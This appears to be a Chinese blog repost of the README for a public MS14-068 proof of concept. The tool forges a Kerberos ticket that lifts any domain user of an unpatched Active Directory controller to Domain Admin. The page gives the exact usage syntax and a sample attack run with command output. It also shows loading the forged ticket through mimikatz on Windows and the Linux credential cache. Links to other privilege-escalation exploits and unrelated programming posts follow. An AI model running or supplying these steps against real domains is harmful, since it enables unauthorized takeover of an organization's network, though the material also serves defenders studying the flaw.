MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员
https://github.com/bidord/pykek
ms14-068.py
Exploits MS14-680 vulnerability on an un-patched domain controler of
an Active Directory domain to get a Kerberos ticket for an existing
domain user account with the privileges of the following domain groups :
Domain Users (513)
Domain Admins (512)
Schema Admins (518)
Enterprise Admins (519)
Group Policy Creator Owners (520)
USAGE:
ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>
OPTIONS:
-p <clearPassword>
--rc4 <ntlmHash>
Example usage :
Linux (tested with samba and MIT Kerberos)
root@kali:~/sploit/pykek# python ms14-068.py -u user-a-1@dom-a.loc
-s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
Password:
[+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!
[+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!
[+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!
[+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!
[+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!
[+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!
[+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!
[+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!
[+] Creating ccache file 'TGT_user-a-1@dom-a.loc.ccache'... Done!
root@kali:~/sploit/pykek# mv TGT_user-a-1@dom-a.loc.ccache /tmp/krb5cc_0
On Windows
python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
mimikatz.exe "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit`
http://zone.wooyun.org/content/17102
MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员的更多相关文章
- CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC
/** * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC * * Vitaly Nikolenko * http://ha ...
- [EXP]Memu Play 6.0.7 - Privilege Escalation
# Exploit Title: Memu Play - Privilege Escalation (PoC) # Date: // # Author: Alejandra Sánchez # Ven ...
- karottc A Simple linux-virus Analysis、Linux Kernel <= 2.6.37 - Local Privilege Escalation、CVE-2010-4258、CVE-2010-3849、CVE-2010-3850
catalog . 程序功能概述 . 感染文件 . 前置知识 . 获取ROOT权限: Linux Kernel <= - Local Privilege Escalation 1. 程序功能概述 ...
- Linux/Unix System Level Attack、Privilege Escalation(undone)
目录 . How To Start A System Level Attack . Remote Access Attack . Local Access Attack . After Get Roo ...
- [EXP]Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation
Windows: DfMarshal Unsafe Unmarshaling Elevation of Privilege (Master) Platform: Windows (not tested ...
- FreeBSD Intel SYSRET Kernel Privilege Escalation Exploit
/* * FreeBSD 9.0 Intel SYSRET Kernel Privilege Escalation exploit * Author by CurcolHekerLink * * Th ...
- Basic Linux Privilege Escalation
(Linux) privilege escalation is all about: Collect - Enumeration, more enumeration and some more enu ...
- Android linux kernel privilege escalation vulnerability and exploit (CVE-2014-4322)
In this blog post we'll go over a Linux kernel privilege escalation vulnerability I discovered which ...
- OSCP Learning Notes - Privilege Escalation
Privilege Escalation Download the Basic-pentesting vitualmation from the following website: https:// ...
随机推荐
- eclipse的c++工程开启c++11
右击工程->Properties->C/C++ Builder->Setting->Tool Setting->Miscellanous->Other Flags添 ...
- iOS 中的字体预览
要预览iOS的各种字体的效果,可以访问http://iosfonts.com
- 【python】zip()函数
来源:http://www.cnblogs.com/frydsh/archive/2012/07/10/2585370.html zip函数接受任意多个(包括0个和1个)序列作为参数,返回一个tupl ...
- Android自定义progressBar
通过继承系统ProgressBar实现 效果图 实现 HorizontalProgressBarWithNumber 自定义属性 <?xml version="1.0" en ...
- cocos2dx创建sprite的多种方法
方法一 最常用,也是最简单的一种方法 CCSprite *bg=CCSprite::create(,,,)); bg->setAnchorPoint(ccp(,)); bg->setPos ...
- Myeclipse中把java代码导成UML类图
Myeclipse中把java代码导成UML类图 1.右键点击项目名称,选择New-------àUML2 Model 2.给类图命名 3.导成类图 1)如果要把整个项目导成类图,则把整个项目拖到类图 ...
- Xamarin.Android开发实践(八)
Xamarin.Android其他类型的服务 一.前言 前面我们已经学了关于服务的很多知识,但是对于真实的开发那些远远不够,通过这节我们将学习其他类型的服务,比如前台服务.IntentService和 ...
- 如何在 Laravel 中使用 SMTP 发送邮件(适用于 163、QQ、Gmail 等)
Laravel 和 Laravel 的邮件发送使用方式完全一致.Laravel 的邮件发送中文文档在:http: 邮箱为例,展示如何用 Laravel 内置的邮件发送类来发送邮件. 配置 修改邮 ...
- android JNI调用(转)
Android jni开发资料--NDK环境搭建 android开发人员注意了 谷歌改良了ndk的开发流程,对于Windows环境下NDK的开发,如果使用的NDK是r7之前的版本,必须要安装Cygwi ...
- 网站构建学习笔记(0)——基本概念了解及资源学习(copy自w3school)
一.学习方面 1.WWW - 万维网 什么是 WWW? WWW 指万维网(World Wide Web) 万维网常被称为Web Web 是由遍布全球的计算机所组成的网络 所有 Web 中的计算机都可以 ...